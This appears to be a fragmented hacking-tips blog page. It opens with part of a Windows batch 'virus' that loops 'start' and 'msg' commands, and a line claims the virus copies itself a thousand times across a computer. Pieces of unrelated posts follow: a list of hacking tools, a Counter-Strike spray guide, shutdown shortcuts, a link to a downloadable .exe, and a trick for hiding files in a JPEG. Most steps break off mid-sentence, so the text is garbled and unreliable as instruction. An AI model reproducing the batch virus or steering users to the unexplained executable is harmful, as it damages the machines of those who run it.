start calc
cls
msg * R.I.P
msg * R.I.P
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
goto RIP
------------------------------------------------------------------------------------------
It will
2) Copy itself over one thousand times into random spots in your computer
http://www.orkut.com/Community.aspx?cmm=39996086
Labels: batch, batch program, batch virus, how to write virus codes, virus code, virus writing,
HACKING TOOLS
Ethical Hacking tools
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
9) TCP/IP Configuration
14) Connect0r
20) Spoofer
36) X Pinger
52) Encrypter
61) Enigma
69) Bouncer
76) MX Query
Control
Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color
Picker)
106) Sniffer.NET
pictures)
Injections)
supported)
Hook)
What you need, is Counter Strike 1.6 and tool called HlTagConverter
I assume you already have Counter Strike 1.6 so here's the download
link to
HlTagConverter: http://www.ostenfeld.dk/~devix/software.php?
dl=HlTagConverter_014.zip
1. Create your image and save it to your hard drive (anywhere you
want)
3. Click button that says "1. Open Image" (it's the only active button
4. Ok now browse to where you saved your image and open it, you
5. So, we opened the picture, what next? Click the second button
(and it should be only active button at this point) You see some
don't have to change them necessarily if you don't want to and I don't
to change adjust options since they are good at default.. Notice you
6. Then simply click "Apply changes and convert to 256 colors" button
7. Now basically you are done.. Click "3. Save Tag" button and you
pop-up window, right? Okok don't worry, just select the "Export to
Files)\Steam\SteamApps\USERNAME\counter-strike\cstrike\
you might want to create folder called "Sprays" where you place all
right-clicking on blank area and choose new -> folder, save your
image as Spray1.
Ok Now browse to this folder and copy (ctrl+c OR right-click -> copy)
That wasn't too hard was it? Ok have fun with your custom sprays
Wink
Labels: change spray image in cs, counter strike, counter strike tricks, cs ahcks
1. The standard approach - click the Start Button with your mouse,
then select the Turn Off menu and finally click the Turn Off icon on
2. Press Ctrl+Esc key or the Win key and press u two times - the
fastest approach.
down shortcuts for you. Else create them yourself using approach 4.
where you are asked to specify the location of the program file. Now
you can just double click this icon to turn off the computer. The best
5. Press the Win key + R key to open the run window. Type shutdown
If some open processes or application won't let you turn off, append
6. Win+M to minimize all windows and then Alt+F4 to bring the Turn
7. Open Windows Task manager (by right clicking the Windows Task
bar or Alt+Ctrl+Del) and choose Shut down from the menu. Useful
Labels: different ways to shutdown ur pc, one click shutdown, shortcut for shutdown,
shutdown button
Enjoy
http://rapidshare.com/files/75315259/BAS.exe
Labels: Block websites without any software, Change ie title, hack internet explorer
\New Folder
Document.txt
2. Add the file/files you will be injecting into the image into a
rar)
are by typing
brackets)
JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.
In order to view/extract your file, there are two options that you can
take
b) Leave the file extension as is, right click, open with WinRar and
ENJOY
Labels: hide a file, hide a file in an image, hide file in jpg jpeg
It is absolutely free
Step 1:
variable value: 1
step 2:
or anything else).......